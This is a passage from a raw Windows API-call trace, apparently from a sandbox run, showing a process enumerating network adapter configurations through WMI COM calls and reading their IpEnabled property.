[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x5223df8) returned 0x0 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.625] WbemDefPath:IUnknown:AddRef (This=0x5223df8) returned 0x3 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x768078) returned 0x0 [0197.625] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x768078, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.625] WbemDefPath:IUnknown:Release (This=0x768078) returned 0x3 [0197.625] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.625] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.625] WbemDefPath:IUnknown:Release (This=0x5223df8) returned 0x2 [0197.625] WbemDefPath:IUnknown:Release (This=0x5223df8) returned 0x1 [0197.625] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.625] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223df8, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x5223df8) returned 0x0 [0197.626] WbemDefPath:IUnknown:AddRef (This=0x5223df8) returned 0x3 [0197.626] WbemDefPath:IUnknown:Release (This=0x5223df8) returned 0x2 [0197.626] WbemDefPath:IWbemPath:SetText (This=0x5223df8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=10") returned 0x0 [0197.626] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.626] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.626] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.626] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.626] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.626] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.626] IWbemClassObject:Get (in: This=0x5223ac0, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257bfc8*=0, plFlavor=0x257bfcc*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257bfc8*=11, plFlavor=0x257bfcc*=0) returned 0x0 [0197.626] IWbemClassObject:Get (in: This=0x5223ac0, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257bfc8*=11, plFlavor=0x257bfcc*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257bfc8*=11, plFlavor=0x257bfcc*=0) returned 0x0 [0197.626] CoTaskMemAlloc (cb=0x4) returned 0x7680b8 [0197.626] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x7680b8, puReturned=0x2576450 | out: apObjects=0x7680b8*=0x5223ef8, puReturned=0x2576450*=0x1) returned 0x0 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x5223ef8) returned 0x0 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.627] IUnknown:AddRef (This=0x5223ef8) returned 0x3 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x5223efc) returned 0x0 [0197.627] IMarshal:GetUnmarshalClass (in: This=0x5223efc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.627] IUnknown:Release (This=0x5223efc) returned 0x3 [0197.627] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.627] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.627] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.627] IUnknown:Release (This=0x5223ef8) returned 0x2 [0197.628] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.628] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.628] IUnknown:QueryInterface (in: This=0x5223ef8, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x5223ef8) returned 0x0 [0197.628] IUnknown:AddRef (This=0x5223ef8) returned 0x4 [0197.628] IUnknown:Release (This=0x5223ef8) returned 0x3 [0197.628] IUnknown:Release (This=0x5223ef8) returned 0x2 [0197.628] CoTaskMemFree (pv=0x7680b8) [0197.628] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.628] IUnknown:AddRef (This=0x5223ef8) returned 0x3 [0197.628] IWbemClassObject:Get (in: This=0x5223ef8, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.628] IWbemClassObject:Get (in: This=0x5223ef8, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=11", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.628] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=11") returned 0x82 [0197.628] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=11") returned 0x82 [0197.628] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.628] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.628] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.628] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.629] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x52235f8) returned 0x0 [0197.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x52235f8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.629] WbemDefPath:IClassFactory:CreateInstance (in: This=0x52235f8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x5224090) returned 0x0 [0197.629] WbemDefPath:IUnknown:Release (This=0x52235f8) returned 0x0 [0197.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x5224090) returned 0x0 [0197.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.629] WbemDefPath:IUnknown:AddRef (This=0x5224090) returned 0x3 [0197.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x7680b8) returned 0x0 [0197.629] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7680b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.629] WbemDefPath:IUnknown:Release (This=0x7680b8) returned 0x3 [0197.629] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.630] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.630] WbemDefPath:IUnknown:Release (This=0x5224090) returned 0x2 [0197.630] WbemDefPath:IUnknown:Release (This=0x5224090) returned 0x1 [0197.630] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.630] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224090, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x5224090) returned 0x0 [0197.630] WbemDefPath:IUnknown:AddRef (This=0x5224090) returned 0x3 [0197.630] WbemDefPath:IUnknown:Release (This=0x5224090) returned 0x2 [0197.630] WbemDefPath:IWbemPath:SetText (This=0x5224090, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=11") returned 0x0 [0197.630] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.630] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.630] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.630] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.630] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.630] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.630] IWbemClassObject:Get (in: This=0x5223ef8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257c800*=0, plFlavor=0x257c804*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257c800*=11, plFlavor=0x257c804*=0) returned 0x0 [0197.630] IWbemClassObject:Get (in: This=0x5223ef8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257c800*=11, plFlavor=0x257c804*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257c800*=11, plFlavor=0x257c804*=0) returned 0x0 [0197.630] CoTaskMemAlloc (cb=0x4) returned 0x7680f8 [0197.630] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x7680f8, puReturned=0x2576450 | out: apObjects=0x7680f8*=0x5224d28, puReturned=0x2576450*=0x1) returned 0x0 [0197.631] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x5224d28) returned 0x0 [0197.631] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.631] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.631] IUnknown:AddRef (This=0x5224d28) returned 0x3 [0197.631] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.631] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.631] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x5224d2c) returned 0x0 [0197.631] IMarshal:GetUnmarshalClass (in: This=0x5224d2c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.631] IUnknown:Release (This=0x5224d2c) returned 0x3 [0197.631] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.632] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.632] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.632] IUnknown:Release (This=0x5224d28) returned 0x2 [0197.632] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.632] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.632] IUnknown:QueryInterface (in: This=0x5224d28, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x5224d28) returned 0x0 [0197.632] IUnknown:AddRef (This=0x5224d28) returned 0x4 [0197.632] IUnknown:Release (This=0x5224d28) returned 0x3 [0197.632] IUnknown:Release (This=0x5224d28) returned 0x2 [0197.632] CoTaskMemFree (pv=0x7680f8) [0197.632] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.632] IUnknown:AddRef (This=0x5224d28) returned 0x3 [0197.632] IWbemClassObject:Get (in: This=0x5224d28, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.632] IWbemClassObject:Get (in: This=0x5224d28, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=12", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.632] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=12") returned 0x82 [0197.632] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=12") returned 0x82 [0197.632] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.632] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.632] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.632] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.633] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5223608) returned 0x0 [0197.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5223608, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.633] 